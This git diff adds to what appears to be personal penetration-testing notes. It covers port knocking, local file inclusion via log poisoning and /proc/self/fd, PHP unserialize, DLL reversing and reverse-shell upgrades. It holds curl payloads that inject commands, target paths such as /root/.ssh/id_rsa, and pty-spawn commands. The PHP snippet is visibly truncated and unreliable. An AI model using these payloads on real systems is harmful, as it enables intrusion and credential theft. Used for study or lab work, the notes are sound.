diff --git a/enumeration/docs/port_knocking.md b/enumeration/docs/port_knocking.md new file mode 100644 index 0000000..e24cf54 --- /dev/null +++ b/enumeration/docs/port_knocking.md @@ -0,0 +1,13 @@ +# Port Knocking + +* Open filtered port behind a firewall by knocking nicely + +## Usage + +* `knockd` +```sh +knock +``` +or +* [arch wiki nmap script](https://wiki.archlinux.org/title/Port_knocking) +* `nc -z` diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md index 3ca217c..611a816 100644 --- a/exploit/web/local_file_inclusion.md +++ b/exploit/web/local_file_inclusion.md @@ -26,10 +26,17 @@ http://example.com/home?page=/etc/passwd ```sh curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log' -H 'Host: ' -H 'User-Agent: Mozilla/5.0 Firefox/70.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'DNT: 1' -H 'Upgrade-Insecure-Requests: 1' ``` - * Follow up with a request to - ```HTTP - curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' - ``` + +* Follow up with a request to + +```HTTP +curl 'http:///lfi/lfi.php?page=/var/log/apache2/access.log&lfi=ls%20../' +``` + +### /proc/self/fd +* [outpost24](https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-2) +* Log poisoning and opening logfile via `/proc/self/fd/xx`. + ### Base64 Encoding via PHP * Circumvent filter via encoding local files included ins a GET parameter value ```http @@ -48,9 +55,11 @@ curl http://test.com/test.php?view=php://filter/convert.base64-encode/resource=< * `/root/.ssh/id_rsa` * `/var/log/apache2/access.log` * `C:\boot.ini` +* `/proc/self/fd/xx` ## Tricks * Terminate query with `%00` or `0x00` does the trick until PHP 5.3.4 * Terminate query with `/.` * `..//..//..//file`, double slashes + diff --git a/exploit/web/php/unserialize.md b/exploit/web/php/unserialize.md new file mode 100644 index 0000000..9a36eb2 --- /dev/null +++ b/exploit/web/php/unserialize.md @@ -0,0 +1,20 @@ +# Unserialize + +* [Not so secure](https://notsosecure.com/remote-code-execution-via-php-unserialize/) + +* Serialize via +```php +'; +} + +print urlencode(serialize(new FormSubmit)); +?> +``` diff --git a/reverse_engineering/docs/dll_reversing.md b/reverse_engineering/docs/dll_reversing.md new file mode 100644 index 0000000..8899c40 --- /dev/null +++ b/reverse_engineering/docs/dll_reversing.md @@ -0,0 +1,9 @@ +# DLL Reversing + +* Start DLL on its own with the help a wrapper +```C# +HMODULE dll = LoadLibraryA("DLL.DLL"); +typedef void(WINAPI* Add_TypeDef)(int, int); // Add(int x, int y) +Add_TypeDef Add = (Add_TypeDef)GetProcAddress(dll, "Add_MangledName"); +Add(1, 2); +``` diff --git a/reverse_engineering/docs/function_mangling.md b/reverse_engineering/docs/function_mangling.md new file mode 100644 index 0000000..d44db63 --- /dev/null +++ b/reverse_engineering/docs/function_mangling.md @@ -0,0 +1,4 @@ +# Function Decoration + +* Done to imported functions in order to do interpositioning and identify the variants of the function. +* [name mangling](https://en.wikipedia.org/wiki/Name_mangling) diff --git a/reverse_shells/docs/prep b/reverse_shells/docs/prep deleted file mode 100644 index c7e911e..0000000 Binary files a/reverse_shells/docs/prep and /dev/null differ diff --git a/reverse_shells/docs/shell_upgrade.md b/reverse_shells/docs/shell_upgrade.md index 75222f8..f41aff4 100644 --- a/reverse_shells/docs/shell_upgrade.md +++ b/reverse_shells/docs/shell_upgrade.md @@ -1,5 +1,9 @@ # Upgrade Reverse Shell +* [HighOn.Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [reverse shell without python](https://www.schtech.co.uk/linux-reverse-shell-without-python/) +* [ropnop](https://blog.ropnop.com/upgrading-simple-shells-to-fully-interactive-ttys/) + ## Via interpreter ### PHP * reverse shell @@ -24,6 +28,11 @@ python -c 'import pty; pty.spawn("/bin/bash")' perl -e 'exec "/bin/sh";' ``` +### Script +```sh +/usr/bin/script -qc /bin/bash /dev/null +``` + ## Next 1. `ctrl` + `z` 2. `stty echo -raw`